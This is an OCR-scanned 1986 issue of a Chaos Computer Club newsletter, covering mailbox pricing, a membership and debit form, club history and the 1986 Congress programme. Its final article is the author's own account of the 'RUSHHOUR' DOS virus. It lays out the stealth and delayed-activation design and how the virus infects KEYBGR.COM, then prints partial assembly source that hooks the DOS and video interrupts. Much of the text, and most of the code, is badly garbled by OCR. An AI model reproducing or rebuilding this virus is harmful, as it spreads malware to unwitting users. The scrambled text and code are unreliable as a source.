Die Abrechnung der Mailboxkosten geschieht im Einzugsverfahren. Anders ist die Verwaltungsarbeif fr uns zu kompliziert. Viele , Kreditinstitute fhren kostenfreie Schlergirokonten (meist ohne Magnetkarte), sollten Euch eure Lehrnmittelgeldverwolter nicht frdern.

c_c '55 D

5 C N
CD

W a s kostet die CCC-Mailbox?


<

1
CD

IsS r -s.? E i -S S -S E

O s

Ii

t 0

trr

i 2 =

JE E o c g 'g I E I_ o c -2

.l t:

c D

fT)

C OCO u 8 ro-c O x jtJl.S b .a M C " -1- :0 il O 'T . i i 'via -s "5 oo>.2>j

! o > 0) -=. o .. :0 o

I 5 3 fi

E H -S

a . 1

Iii

i i

C O 41

? = S c S o>
a

-D-C OJ 0)

S u 5 B s .2 S QQ

-C

-C


Postleitzahl, O r t D a t u m

11 ft

Grundgebhr inklusive 47 Freiminuten monatlich D M 8,-. Die werden eden M o n a t eingezogen. Die Bank erhlt eine Floppy von uns. Dazu kommen bei Bedarf: ede weitere Anschaltminute 15 Pfg je versendete Nachricht im CCC-System 7 Pfg e Telefonalarm (BRD) 80 Pfg desweiteren leider noch Geldbeutel: Datenbankgebhren je noch Datenbankabfrage Telex, Telexgebhren plus geringer Zeitgebhr Nachrichten in andere Systeme, Datex-P Zuschlag. Htiti? Ihr erreicht das CCC-System ber einen Telefonport (Bremen) oder mehrere Datex-P Zugnge- Fr D M 8,- habt ihr einen Eintrag auf dem CCC-System. Die Nutzungsgebhren innerhalb des Systems sind preiswert. Teurer werden Datenbankdienste, Telex und Intermailverbindungen zu anderen Mailboxsystemen. Die werden e nach A u f w a n d weiterberechnet.

Chaos Communication Center Hintergrundinfo


Der CCC schafft einen elektronischen Treffpunkt als Forum fr seine Mitglieder und whlte ah Werkzeug GeoNet, dos derzeit ausgereifteste Moilboxsystem in Europa. Als Betreiber machte die Bremer Infex G m b H das beste Angebot. Die Infex G m b H stellt dem CCC Systemanteile ouf einem nur von Vereinen genutztem Mailboxsystem zur Verfgung. Die Einzelobrechnungen der Teilnehmer werden nicht vom Betreiber (Infex), sondern vom CCC durchgefhrt. So ist es mglich, kostengnstig ein GeoNet-Mailboxsysfem im Rahmen der CCC Mitarbeit zu gebrauchen. Die GeoNet Mailboxsysteme werden derzeit in der Bundesrepublik neben der Infex auch von der Deutschen Mailbox kommerziell betrieben. Die 'sterreichische Post hat sich, im Gegensatz zur Bundespast, fr ein GeoNet Mailboxsystem entschieden. Durch die relativ hohe Kostenschronke von ca. D M 40,Grundgebhr konnten sich bisher nur Firmen den Komfort eines solchen Systems leisten. Der CCC ermglicht bei Mindestnutzung des Systems fr Mitglieder Nutzungskosten von D M 8,- im M o n a t . 'Die im GeoMaii- Verbund jetzt zusammenarbeitenden mehreren Tausend Benutzer reprsentieren eine sehr heterogene und internationale Leserschaft mit Querverbindungen zu vielen anderen elektronischen Medien und damit zu einer Graz* R o o t P o p u l a t i o n (elektronische Eingeborene) von aufgeschlossenen Menschen, die nicht nur passiv Nachrichten konsumieren, sondern sie dank des Mediums MAILBOX aktiv und aufwandsarm kommentieren knnen. Es ist diese neue Fhigkeit, die Mailbor-Systeme so grundlegend anders machen, als traditionelle Kommunikations-Medien " (Gnter Leue, GeoNet)

W a s verdient der CCC daran?


Nix. Die Mailboxgebhren werden ohne Aufschlag weitergegeben.

Einzugsermchtigung. Das Mitglied ermchtigt den CCC eV

W a s habe ich zu beachten?

widerruflich, die Mitgliedsbeitrge lahrlich oder halb|ahrlich sowie die Nutzungsgebhren fr dos Chaos Communication Center monatlich abbuchen zu lassen. Datenschutzhinweis: schaft zur } ZA N o m e d e / r / i chco Postgirokonto-Nr. Tllnhmr/ln/s

Die Daten werden whrend der maschinellene^VerarMvn^

Mitglied-

Fr die Mailbox wird derzeit die Nutzungsordnung vom Chaos Computer Club erstellt. Sie regelt das Teilnehmerverhltnis entsprechend den Vertragsbedingungen fr die Benutzung des INFEX-Systemes. Wesentliche Punkte enthlt dieser Beitrag.

Was passiert nun?

| von n a c h s t e h e n d a n g e g e b e n e m Konto einzuziehen

! beim Postgiroamt J - L Bankleitzahl des Kreditinstituts

ZA

Girokonto-Nr

1I

1. Ich flle den Antrag rechts krftig aus! 2. W i r stimmen "meist zu. 3. Der Beitrag wird berwiesen, eingezogen oder gebracht. 4. Liegt eine Einzugsermchtigung vor, stellen wir auf Wunsch einen Eintrag im CCC-System zur Verfgung. 5. Weitere Leistungen fr Mitglieder knnen nicht ausgeschlossen werden und sind beabsichtigt.

Grundstzliche M e r k m a l e des CCC-Systems


Zugriff ber das Ferngesprch (1 Port / 37nl d) __ Zuariff ber das Datex-P Netz (7 Ports) 'jSf mehrsprachige befehlsorientierte Dialogfhrung gleichzeitiger Zugriff durch 8 Hacker zeitgesteuerte Verwaltung von 23 persnlichen Bitbergen Schwarze Bretter, themenbezogene Infosammelpltze clubbezogen und zu allgemeinen Interessen Nachrichtenaustausch mit Teilnehmern oder Schwarzen Brettern in anderen GeoNef-Systemem im In- und Auslond Dioloamglichkeit onwesender Teilnehmer Findefunktionen fr Nachrichten und Verzeichnisse Telefonsklave zur Alarmierung von Teilnehmern bei ^ wichtiger Post * Versand und Erhalt von Telexen (derzeit nur weltweit) Zugriff auf Datenbanken, Presseagenturen... Neben dem CCC werden zwei weitere Vereine und einige Wissenschaftlergruppen gemeinsam, in einem Mailbox-Gremium, das System gestalten. Der CCC wird die Clubarbeit und den Kontakt unter den Mitgliedern aus oller W e l t auf seinem elektronischem Clubcenter

B
5

31 1
N a m e und Anschrift d e s Kreditinstitutes

W i e komme ich wieder raus?

o > rDJ ) o :(0 I v

Aus dem CCC nur einmal im Jahr mit dreimonatiger Vorwarnung. Aus der Mailbox mit drei Monaten Kndigungszeit.

CHAOS-TEAM

Chaos Communication Congress 1986

Das Konto wird beim Geldinstitut unter folgender Bezeichnung gefhrt (Name des Kontoinhabers) I I I I 1 1 ' 1 1 1 1 1

+ 2Q

e z e*

E Von den Hinweisen k

I 1 I 1 I

d e r D e u t s c h e n B u n d e s p o s t fr d i e Teil-

<> / o > 3
N .

n a h m e a m L a s t s c h r i f t e i n z u g h a b e ich K e n n t n i s g e n o m m e n .

1 ., 1 1 1 1 1 1 W i r d v o m A m t fr Chaos gsprft SA 00 geprft ggf. SA 80 geprft

Unterschrift do/r/s Kor.tolnhe.bor/ln/s

' Durch dos verlngerte W e i h nochtswochendende ergibt sich diesmal kein Wochenendtermin. Die Aufbauarbeiten in den Rumen des Eidelstedter Brgerhauses beginnen am Samstag dem 27. Dezember. A b Sonntag knnen Arbeitsgruppen, Hilfskrfte und Teilnehmer anreisen. Obernachtungsmglichkeiten werden vom Sonntag bis Dienstag bereitgehalten. Der Congress wird am Montag um 10 Uhr erffnet und endet Dienstag gegen 22 Uhr. Anregungen fr Themenbereiche, sowie Referenten sind willkommen (Fernmndlich 040/483752 Leitstelle 23 da meldet sich ein MENSCH!). Weitere Informationen sowie die Teilnahmebedingungen werden zum Augyst in der datenschleuderbe- dem CHAOS C O M M U N I C A T I O N CENTER, abwickeln. kanntgegeben. Is23 ev2.txt

WteWR MRZUStebdT
mit neuer Adresse zurck

2 oof-!

20 ^ eone1:

^Chaos-Teom

^ O t C I t M l k U b C t Anschriftenausschnitt bitte ScuTkeTtroe85 Bi 6 5 5 3 2 1 #


as r i n e ^ M k * .

Fach^WrOa.enrei^nde

^ i e

atendjeufcer

Nummer 17 Dezember 1986

Modernes Opfer dpa Heilbronn Die Verwechslung z w e i e r A d a p t e r s t e c k e r h a t in d e r H e l l b r o n n e r K i n d e r k l i n i k z u m Tod e i n e s 1 6 M o n a t e a l t e n M d c h e n s g e f h r t . Eine K r a n kenschwester h a l t e MeBefektroaen eines Gertes, das das Herz berwacht, an einen Infusomaten angeschlossen. Oas B a b y b e k a m einen Stromschlag von 2 2 0 Volt. (Hmb. Abdbl. 2.5.86) Die Informationsgesellschaft unserer Tage ist ohne Computer nicht mehr denkbar. Die Einsatzmglichkeiten der automatisierten Datenverarbeitung und Datenbermittlung bergen Chancen, aber auch Gefahren fr den Einzelnen und fr die Gesell1 schaft. (Prambel der CCC Salzung) Chaos C o m p u t e r Club Das groe Informationsbedrfnis in der Bevlkerung berflutePartner auf d e m W e g rur Informationsgesellschaft. te das Chaos-Team mit Bergen von Anfragen, aber auch VerMit Wirkung vom 14. April 1986 wurde der Chaos Computer Club e. V. unter der Nummer 10940 beim Amtsgericht Hamburg waltungsarbeiten. Die Aboabteilung der Datenschleuder erwies sich als ein IcraftsaJgendes schwarzes Loch. Dem CCC fehll es in das Vereinsregister eingetragen. an einem tatkrftigen Sekretariof plus Computern. Auch die Es begann 19811 mit einem Treffen von Camputerfreaks in BerClubrume in Hamburg (Anlaufadressse, Redakfionsrume und lin. Die ersten Personal Computer eroberten die Bros und w a Tagung von Erfahrungsaustauschkreisen) stellen den Club vor ren zu erschwinglichen Preisen im Handel. finanzielle, organisatorische und rechtliche Probleme. Man wollte Informationen tauschen, doch g a b es damals kaum Zahlreiche Anfragen, zur Teilnahme an ffentlichen InformoMglichkeilen dafr. Die Bundesrepublik war auf diesem Getionsveronstolfungen rund um Information*- und Kommunikabiet ein Entwicklungsland. tionstechniken, Verbraucherschutz sowie den Einsatz sozialverIm Februar 1984 erschien die datenschleuder mit Informationen trglicher Technologien drohten die Kapazitten der hamburfr die Szene, die sich als "wissenschaftlich" bezeichnet, fr die ger Gruppe zu sprengen. aber auch Bezeichnungen wie "Underground-Postille" und Einziger Ausweg ist die Offensive, die Grndung eines Verei"Hackerschmierblatt" verwendet werden: dos Fachblatt fr Danes. Dadurch ist es dem CCC mglich, jedem Mitglied die N u t tenreisende. zung eines Mailbox- und Informationssysteme zugnglich zu Seitdem bemht sich ein offener Kreis von Leuten darum, Informaenen. Der CCC bietet ein Forum zum elektronischem Informationen ber die Verwendung der Technik insbesondere mationsaustausch auf internationaler Ebene. Neuer Medien zu sammeln und zugnglich zu machen: N a c h uns die Zukunft: vielfltig uns abwechslungsreich durch Braerhilfe I m Technikdschungel. Ausbildung und Praxis im richtigem Umgong mit Computern. Dren die spektakulre Btx-Aktion des CCC im September "84 W i r verwirklichen soweit wie mglich das NEUE Menschenrecht (Verbraucherschutzaktion 134.000,- bei der Haspa) erregte der auf zumindest weltweiten freien, unbehinderten und nicht kon-. Club bundesweites Aufsehen. trollierbaren Informationsaustausch unter ausnahmslos allen Leider sind wesentliche Aktivitten des CCC im Medientrubel Lebewesen. untergongen oder wurden flschlich dargestellt. Computer sind dobei eine nicht wieder obschoffbare VorausTeile der Presse schreiben " H a c k e r " in Gnsefchen und versetzung. C o m p u t e r sind S p i e l - / W e r k - , u n d D e n k kaufen sie als Computerterroristen und gefhrliche DatenruZ e u g ; vor a l l e m a b e r : " d a s wichtigste neue M e ber. Whrend mit einer Hacker-Panik noch Zeitschriftenumstd i u m " . Zur Erklrung: Jahrhunderte nach den " P r i n f - M e d i e n ze geschrt werden und ngstliche Anwender von cleveren "Bewie Bcher, Zeitschriften und Zeitungen enstanden Medien zur ratern" die bedenklichsten Sicherungssysteme aufgedrckt beglobalen Verbreitung von Bild und Ton; also Foto, Film, Radio kommen, und viele den Computer verteufeln, zieht die Informaund Fernsehen. Das entscheidenste heutige neue Medium ist tionsgesellschaft kaum bemerkt in unsere Kinderzimmer ein. der Computer. Mit seiner Hilfe lassen sich I n f o r m a t i o n e n Hockersmd neugierige Reisende im modernen Alltag. Forscher " b e r a l l e s d e n k b a r e 1 ' In d i e s e r G a l a x i s bermitteln und Menschen, die sehr bewut und offen mit Neuen und kraft des Verstandes wird neues geschaffen." (Aus Technologien umgehen. der Datenschleuder 1, Februar 1984). Computerkriminelle haben im Gegensatz dazu GeheimhaltungBildschirmtext hat gezeigt, da man ein 2-Klossen-System (Ansprobleme und Bereicherungsabsichten. bieter und Abrufer) keinem bewutem Menschen zumuten Die Gesetzgebung zur Computerkriminalitt trgt dem auch kann. Mailbox-Systeme kennen nur eine Klasse. Jeder TeilnehRechnung. mer kann Informationen abrufen, kommentieren oder selber Die lteren und die deutsche Industrie betrachten welche ber die Schwarzen 8retter anbieten. erstaunt die Cntwlckluna, manche fassungsund taEine Mitgliedschaft im CCC e.V. ermglicht die Teilnahme am tenlos. Andere begreifen, was los Ist. I n s g e s a m t Nachrichtenverkehr auf einem G e o n e t - S y s t e m zu Preisen wchst das Bewutsein u m Datenuniicherheit stetig, der W u n s c h m a s c h i n e Bildschirmtext. Alle M a l l b o x - T e l l aber langsam. n e h m e r s i n d g l e i c h b e r e c h t i g t e Informationsanbieter in Zum Herbst '85 stellte der CCC sein W i s s e n In der H a c k e r einem Informafionsbasor rund t/m Wissenschaft, Technik und b i b e l Teil 1 zusammen (Die Hackerbibel ISBN 3-922708-98-6). alles was Spa macht und wenig kostet. Kommerzielle AktivitDas 256 Seiten umfassende W e r k wurde bisher Ober 3500 mal ten der Mitglieder sind dort unerwnscht. zu einem "sozialem" Preis von ca. 13 Pfennig die A4-Seite ver"Der Chaos Computer Club ist eine galaktische Gemeinschaft trieben. von Lebewesen, unabhngig von Alter, .Geschlecht und Rasse Zweimal bisher, jeweils zum Jahreswechsel, veranstaltete der sowie gesellschaftlicher Stellung, die sich grenzberschreitend CCC den Chaos Communication Congress. Das jhrliche interfr Informationsfreiheit einsetzt und mit den Auswirkungen von nationale Treffen von ber 400 Datenreisenden fhrte interesTechnologien auf die Gesellschaft sowie das einzelne Lebewesierte Menschen zusammen und verdeutlichte die Lage: Wenig Informationen, kaum technologische Frderung der Jugend, f" beschftigt und das Wissen vm diese Entwicklung frdert" keine Erfahrung Ober die Sozlalvertrogllchkeft neuer Tech- i r ^ t x ^ f W nologten. Der CCC behlt seine offene Struktur. Er bietet Interessierten Darin spiegelt sieh auch die R a t a n t d e r E n t w i c k l u n g . mehraUein Forum: Mit um die Zukunft!

Das wissenschaftliche Fachblatt fiir Datenreisende Ein Organ des Chaos Computer Club

Chaos Communication Congress '86

Die Europische Hackerparty

D a m i t Sie auch morgen noch kraftvoll zubyten knnen: Z u m dritten Mal veranstaltet der C C C in Hamburg seinen C o m m u n i c a t i o n Congress. Vom 27. Dezember (Aufbauiag) ber Sonntag und Montag (Congresstage) bis z u m Dienstag den 30. Dezember (Abbautag) treffen sich Datenreisende, Telefonfreaks, Informationspfadfinder, Funkmaniacs, Netzflaneuere, Bitniks, H a c k e r u n d Hacksen. Veranstaltungsort ist das Eidelstedter Brgerhaus. Elbgaustrae 12, in Hamburg Eidelstedt. Dort ffnen sich am Sonntag den 28. Dezember gegen 10 Uhr die Tore. Helfer und Referenten werden schon ab Samstag Nachmittag eingelassen. Wegen der technischen Demonstrationen gelten die Rumlichkeiten als Elektrisches Labor", zu dem nur Unterwiesene Zutritt haben. Jeder Teilnehmer hat sich bei rtlichen Funkamateuren oder Elektronikern vorher fachkundig zu machen. Das Fotografieren sowie das Aufzeichnen mittels Tontrgern ist, wie in den vergangenen Jahren, aus Datenschutzgriinden untersagt. Im Rahmen der Pressearbeit sind TVTeams anwesend. Gste bentigen dieses Jahr kein Passfoto, lediglich Helfer bekommen einen Ausweis und so/flen ein Passfoto mitbringen. Sollte ein Gast a u f einem SOU-

V E N I R bestehen, erhlt er natrlich einen. Der Eintritt betrgt fr Mitglieder ( C C C e V ) D M 15,-, fr alle anderen D M 20,-, mit Ausnahme der Presse ( D M 50,-) und gewerblichen Teilnehmern ( D M 150,-) Voranmeldung durch Einzahlung auf Postgiros 599090-201 beim Postschleckamt Hamburg B L Z 20010020 fr den C C C e V . Bitte Beleg mitbringen! Der Betrag gilt fr die ganze Congrcssdauer. Schlafpltze sollte man sich privat besorgen. Fragt ber die Hamburger Mailboxen an. Wer es sich leisten kann, dem sei ein preiswertes Z i m m e r a u f der Reeperbahn (da gibts nachts noch was zu essen) empfohlen. Fr Ausnahmeflle hat der C C C ca. 30 Nachtlager (Schlafsack!) von Samstag bis Montag in petto. Whrend des Congresses ist die C O N G R E S S - B O X unter der R u f n u m m e r 040-5703060 online. (ACHT U N G : Diese N u m m e r gilt nur vom 27. - 30.12.!) Die V E R M I T T L U N G des Congresses ist ber die R u f n u m m e r 040-5703086 ab Freitag erreichbar. W E I T E R E I N F O R M A T I O N E N in der C C C Geschftsstelle 040-4903757, der C L I N C H - M a i l b o x 040-6323517 oder, fr Referenten und was Organisationsfragen betrifft, Leitstelle 23 : 040-483752 (Voice!).

Datenschleuder I

K l 6PATCTB >'ff r r r f *
TO TEST TO A I X P Q M O TETPAfQNO

Wo ist der CCC?


Zur Lage der Chaos Communication Center Informations

Kongressfahrplan
Samstg 27. Dezember (Auftautag) Fr Techniker, Referenten und Untersttzer

Der CCC bietet seiner Mitgliedern zwei Mglichkeiten zur elektronischen Kommunikation an:

2. Die CLINCH-Box (Uber Telefonport Hamburg und Datex-P) Der wesentliche Grund zur Verlagerung der Clubkommunikation ist der Standortvorteil der CLINCHBox. Sie ist fr die Hamburger zum Ortstarif erreichbar und verfgt zudem ber einen Datex-P-Zugang. Die CLINCH-Box unterscheidet sich jedoch von dem Standard der INFEX-Box. So kann jeweils nur ein Nutzer(wahlweise Telefon oder Datex) zugreifen. Auch fehlt der Komfort in Sachen Datenbanken und Telexverkehr. Es wird zwar eine Vermittlung angeboten, die jedoch nur ein Notlsung ist. Wer den TelexZugang bentigt, sollte das komfortablere 1NFEXSystem whlen. Auf derCLINCH-Box wird in Zukunft die DATENSCHLEUDER redaktionell erstellt und (da dieses System auf Selbstkostenbasis betrieben wird) auch kostenfrei zum Abruf angeboten. Es finden sich dort auch diverse Diskussionsforen der Mitglieder und anderer Gruppierungen. Hier kurz die Nutzungskosten der CL) NCH- Box: Mitgliedschaft im CCC (fr den Zugang zu den clubinternen Infos) Fr Schler und Studenten DM 24,- jhrlich Fr Vollverdiener DM 60,-jhrlich zuzglich Kosten fr vermittelte Dienstleistungen (Telex,Datenbankabfragen..) Die Nutzungsgebhren fr das System werden direkt von der CLINCH Box in Rechnung gestellt. Kndigungsfrist zum Ende jeden Monats. Die Redaktion hofft, da durch Wahl eines preiswerteren Kommunikationsweges mehr Interessenten den Zugang zu Clubinformationen finden, als dies bisher mglich.war. Weiterhin werden die Mitglieder, die einen Zugang zu GEONET bentigen, diesen im Rahmen der Mitgliedschaft preiswert erhalten. Im Vordergrund der Auswahl fr eines der beiden Systeme sollte einzig die Frage des Bedarfs stehen. Gewisse Kommunikationsaufgaben lassen sich nur mit kommerziellen Systemen bewltigen, andere hingegen sind preiswerter lsbar. Lassen Sie sich von der Geschftsstelle des CCC beraten. Anfragen zur Teilnahme an den Mailboxsystemen im Rahmen der CCC- Mitgliedschaft knnen an die Clubadresse oder die CLINCH Box mit dem Stichwort CC-Center" gerichtet werden. Fernmndliche Ausknfte: CCC Geschftsstelle: 040- 490 37 57 Btx-Redaktion LS23 :040- 48 37 52 Datenausknfte: CLINCH Telefon : 040- 632 35 17 CLINCH Datex : 44400090314 Im GEONET : Brett IFX1 :DatenschIeuder LS23
Datenschleuder 3

I. Die INFEX-Mailbox (ber DATEX-P) Fr eine Eintragungsgebhr von DM 20,- sowie eine monatliche Mindestnutzungsgebhr von DM 8,- wird die Nutzung eines GEONF.T-Systems angeboten. Auf diesem kommerziell genutzten System haben die Mitglieder den blichen Komfort eines GEONETSystems. Dazu zhlen: Mitteilungsversand im GEONET, Telexzugang und Abfrage von Datenbanken usw. Aus Kostengrnden wird die elektronische DATENSCHLEUDER in Zukunft kostenpflichtig" im GEONET abzurufen sein. Es ist dem CCC nicht mglich, weiterhin die hohen Aufwendungen zur Informationsgestaltung zu bezahlen. Diese Beweggrnde stehen auch hinter der Entscheidung, wesentliche Teile der Clubkommunikation auf die Hamburger CLINCH-Box zu verlegen. Im Wesentlichen bestehen jedoch weiterhin die in der DS16 erwhnten Leistungsmerkmale. Es ist immer noch unklar, wann die INFEX-Box ber einen Telefonport erreicht werden kann. Wir empfehlen die Teilnahme am INFEXSystem all denen, die fr ihren Kommunikation einen TELEX-Zugang bentigen und die Vorteile eines Mehrportsystemes zur reibungslosen Kommunikation brauchen. Hier kurz die Nutzungskosten der INFEX im Rahmen der CCC Nutzung: (Mitgliedschaft im CCC sowie Erteilung einer Einzugsermchtigung) Eintragung einmalig DM 20,Mindestnutzung fr mtl. DM 8,je Verbindungsminute DM -,l 5 ! je Nachricht DM -,07 ! je Telefonalarm DM -,80 ! Telex, Datenbanken und InterMail-Vermittlungen extra. ! (Diese Preise werden bei negativer Feststellung der Gemeinntzigkeit des CCCeV noch mit der Mehrwertsteuer belegt.) Monatlich werden die angefallenen Nutzungskosten berechnet und eingezogen. Die Kndigungsfrist betrgt 3 Monate.

Sonntag 28. Dezember (1. Congresstag) 09:00 Einlass fr Mitarbeiter, Techniker und Referenten 09:30 Abnahme der Rume (letzter Sicherheits Check) 10:00 TOR!: Einlass frGste. ffnung. HACK-CENTER: Technik al la Cart' CHAOS-CAFE: Frhstck und Cafe TR.EFF: Raum fr Gesprchsgruppen (bitte anmelden) ARCHIV: Fotokopiererund viel Papier B1LD&FUNK: Datenfunk und Bildschirmtext 11:00 THEATER: Erffnungsansprache. Hinweise zum Ablauf 11:30 TREFF: Infotreff fr die Presse (max. 30 Min.) 12:00 TH EATER: Sichere Kopplung an das Postnetz. Was luft bei der Post; Prfverfahren. Verhalten bei Hausdurchsuchungen. (Workshop BHP,CAC,CCC) 13:30 THEATER: Parlakom - das Parlament am Netz. Camputer im Bundestag (Vortrag der Hamburger) 14:30 THEATER: Die Computer Artists Cologne stellen sich vor. 14:30 TREFF: Datenfernbertragung fr Anfnger (Workshop) 15:30 THEATER: PC-Virenforum (Workshop BHP.CCC undGste) - Was sind Computerviren? (Vortrag) - Wie arbeiten Viren? (prakt. Demo) - Gibt es einen Schutz vor Viren? (Workshop) - Umgang mit Viren, Ausblick (Diskussion) 18:30 Ende 18:50 THEATER: Video Uber den letzten Congress (bis 20:20) 19:00 TREFF: Organisationsgesprch der Projektletter 19:30 Schliessung der Rume. Alle gehen ins Theater. 20:00 THEATER: Hinweise auf das Programm vom Montag, bernachtungsmglichkeiten,... 20:30 Tagungsende 21:00 Schliessung der Rume (Wachdienst)

Montag 29. Dezember (2. Congresstag) 08:00 Aufklaren der Rume durch Nachtschicht 09:00 Einlass der Mitarbeiter, Raumabnahme 09:30TORI: Einlass frGste. ffnung. 10:00 THEATER: Programmvorschau 10:30 THEATER: Kompromittierende Abstrahlung; Abhren von Monitoren und Fernsprechern. (Workshop BHP.CCC) 11:30 TH EATER: Frhschoppen Fnf Hacker aus sechs Lndern (in Englisch) 13:00 TREFF: Pressetrefr (CCC.CAC.BHP und Gste) 13:00 TH EATER: Resmee des Sysoptages vom letztem Congress. Kurz zu InterpoolNet. Hinweise auf Workshops. 14:00 THEATER: Informationen zum Netzverbund FI DO-NET 14:00TREFF: Auswirkungen des 2. WiKg. Workshop auch ber "Hacker-Jger" (BHP) 15:00 THEATER: Desktop Puplishing - die Zeitschrift vom Schreibtisch. Am Beispiel des Genethischen Informationsdienstes. (Vortrag) 15:00 TREFF: Regionale Vernetzung von Mailboxen, Serversystem (Vortrag und Demo CAC) 16:00 THEATER: Noch offen 16:30 TREFF: Btx als preiswerter Datenserver. Vorschlag zum Datenaustausch fr Mailboxsysteme. (Idee) 17:00 TREFF: Mailboxen - neue Konzepte (Refcrat&Diskussion) 18:00THEATER: Abschlussansprache, Ausblick 20:00 Schliessung der Rume fr Gste 21:00 Abbau der privaten Technik (geordneter Rckzug) 22:00 Schliessung der Rume (Wachdienst)

&

NAHE VIRUS

Funktion und Aufbau des Virus "RUSHHOUR"

(Luft auf allen IBM-kompatiblen Rechnern, nicht jedoch auf allen MS-DOS Rechnern wie Olivetti usw.) Viel ber allgemeine Computerviren will ich hier nicht reden, sondern nur den Aufbau und die Funktion meines Virus erklren. Folgende Forderungen an das VirusProgramm hatte ich mir gestellt: 1: Es sollte so unauffllig wie mglich arbeiten, d.h. kein Disketten- oder Plattenzugriff der dem aufmerksamen (!!) Benutzer unlogisch vorkommt. 2: Absolut alle bisher auf dem Rechner lauffhigen Programme sollten weiterhin vllig normal rechnen. 3: Der Virus sollte sich kontrolliert vervielfltigen, d.h. er sollte sich nicht an jedes Programm hngen, damit seine Existenz nicht durch eine immer mehr belegte Platte/Diskette auffllt. 4: Die Aktivitt des Virus sollte zeitverzgert einsetzen, um die Herkunft des Virus (also: welches Programm hat den Virus eingeschleust) zu verschleiern. Am Anfang hatte ich mir berlegt, einen Virus zu schreiben, der sich in jedes lauffhige Programm (.COM oder .EXE) einbinden kann. Das lie ich dann aber aus folgenden Grnden sein: 1: .COM und .EXE-Files sind unterschiedlich in ihrer Datei struktur. Das V-Programm mu zwischen den Arten unterscheiden knnen und sich selbst der Struktur anpassen. Das kostet unter Umstnden sehr viel Speicherplatz fr den Virus. 2: Eine Infektion von so vielen Dateien ist durch den vermehrten Platzbedarf auf dem Speichermedium auffllig. Ich entschloss mich daher, den folgenden Weg zu gehen: Der Virus setzt sich nur in einem bestimmten Programm fest, das vom Computer unbedingt bentigt wird, also im Betriebssystem oder in einem Teil davon. Ich whlte den Tastaturtreiber K E Y B G R . C O M fr diesen Zweck. Der Grund dafr war einfach, da die meisten IBM-kompatiblen Rechner nicht mit PCDOS 2.0, sondern mit dem (fast!) identischen MSDOS 2.11 arbeiten. Dieses MS-DOS, bzw. dessen Tastatur-Treiber, war fr den Olivetti M24 vorgesehen, der im Vergleich zum I B M eine komplexere Tastatur besitzt. Luft der Tastaturtreiber auf einem IBM, so ist das Vergeudung; der eigentlich bentigte Tastaturtreiber umfat nur 1543 Bytes, whrend der benutzte 6549 Bytes lang ist. Ich hngte also an den IBMTreiber einfach mein Virus-Programm und der Treiber war schon etwa 2000 Bytes lang dann wurde er noch auf die "bentigten", d.h. unaufflligen 6549 Bytes erweitert (hier knnte z.B. ein 4500 Zeichen langer Text ber die Gefhrlichkeit der Computerviren abgelegt werden) und fertig ist der Virus. Der Virus sucht, wenn er im System ist, bei jedem vom Benutzer erzeugten Piatten/Diskettenzugriff im aktuellen Directory nach dem Tastaturtreiber. Die Unterscheidung infiziert/sauber wird nach der Zeit der letzten nderung des Files KEYBGR.COM getroffen. Das MS- DOS File hat eine gespeicherte Zeit Datenschleuder 4

von 9:00:03 (angezeigt im D I R wird 9:00 ) whrend das infizierte die Dateizeit von 9:00:00 hat, Somit ist eine Unterscheidung allein aus dem Directory-Eintrag ohne langwierigen weiteren Diskettenzugriff mglich. Alles weiteren wichtigen Informationen geben die Kommentare im Quellcode.

Ergnzungen der Redaktion zum Virusprogramm:

INT IAH ; Lese TlmeOfDay (TOD) M V TIMEO,DX O L A DX.VIRUSEWDE E INT 27H ; Program beenden, aber ; resident bleiben. VD O E T R D 2 D P (?) I E VCO W U D S E T R D 2 D P (?) O V CO W U E R R E T R D 2 DUP(?) R O V CO W TIMEO D 7 W VIRUS Hauptprogrammte11 1. Systenaufruf AH-4BH ?

MOV AH,0

O G 4 *10K R VIDEOINT 0 2 O P (7) ; VIDEO INTERRUPT V C O W U ETR O G 4 * 21H R DOSINT D 2 D P (?) ; D S W U O O G 4 *24 H R E F RN 0 J O P (?) ; E R R RO I T W U RO AS ED BO NS C D SG E T O E E MN A S M CSiCODE, DS:CODE, ES:C0DE SU E OG D C R SH F B LABEL B T C YE DRIVE D ? B F P C D 11 D P (' *) ; Filename SE B U OG 6 H R C FS12E D 2 D P (?) W U ..'i::. F A E D ? ; Datum des letzten Schreib! DT M FTIME D ? ? Zeit --W ;.::.!.:.:;' O G 80H R D A D 12 8 D P (?) ; Disk TransfarsArtta T W O O G 071EH ; Ende des normalen, tiBfciCOM R X R AX,AX O M V ES,AX ; E teigt auf AaSO:;%:S' O S : A S M ES:ABSO SU E - : : :: >>* PS C UH S PP D O S MOV ax,videoint ; speteirtr^'alte M V BX,VIDEOINT+2 O M V VIDEOVECTOR,A> O M V VIDEOVECTOR 2, SJf O M V AX,OOSINT O M V BX.DOSINT+2 O M V D S E T RA O O V CO , X MV D S E T R2 B O O V C O +, X CLI M V DOSINT,OFFSET VIRUS ; Neuer D S - .Wct.flE;;tl&t; auf O O VIRUS M V DCSINT+2,CS O M V VIDEOINT,OFFSET DISEASE f O 6r lelgt auXil? DISEASE M V VJDEOINT+2,CS O STI

ABSO SEGMENT AT 0

l "fahler" M V BX,ERRORINT durch olgonr- Kehlnrroutln O M V E R R E T RA O R O V CO . X H V ERR0RVECT0R*2,BX O M V ERRORINT,OFFSET E R R O RO M V ERRORINT* 2, C O S PS C UH S PP E O S A S M ES:CODE SU E L A DX, D A ; Disk Transfer Area anwahUn E T H V AH,IAH O INT 21H M V BX,11 ; Uebertragen des Dateinamens O $2: M V AL.FNAME-1BX ; In den Fl leCom. rol Block O M V FSPEC-1BX,AL O DC B E X JN2 $2 L A DX,FC3 ; oerfne Datei ( zum Schreiten ) E M V AH,OFH O INT 21H C P AL, 0 M J E EXITO ; Datei existiert nicht ' End N M V AX,FTIME , Datei schon Infiziert ? O C P AX,40OOH M JE EXITO ; Ja Ende M V PRESET,1 ; (Alle Kopie O M V SI.IOOH ; Schreibe den O 54: LEA DI,DTA M V CX,12S O RP M VB E OS L A DX,FCB E M V AH.15H O INT 21H C P SI,OFFSET VIRUSENDE M JL 34 M V FSIZE,OFFSET VIRUSENDE - 100H O M V FSIZE*2,0 ; Korrekte Dateigroesse setzen O M V FQATE,QAA3H ; Korrektes Datum 103.05.86) O M V FTIME,4800H ; Korrekte Zeit ( 9:00:00) O ; setzen LEA DX,FCB ; Datei schllessen

: *<::::: SS S ; >:

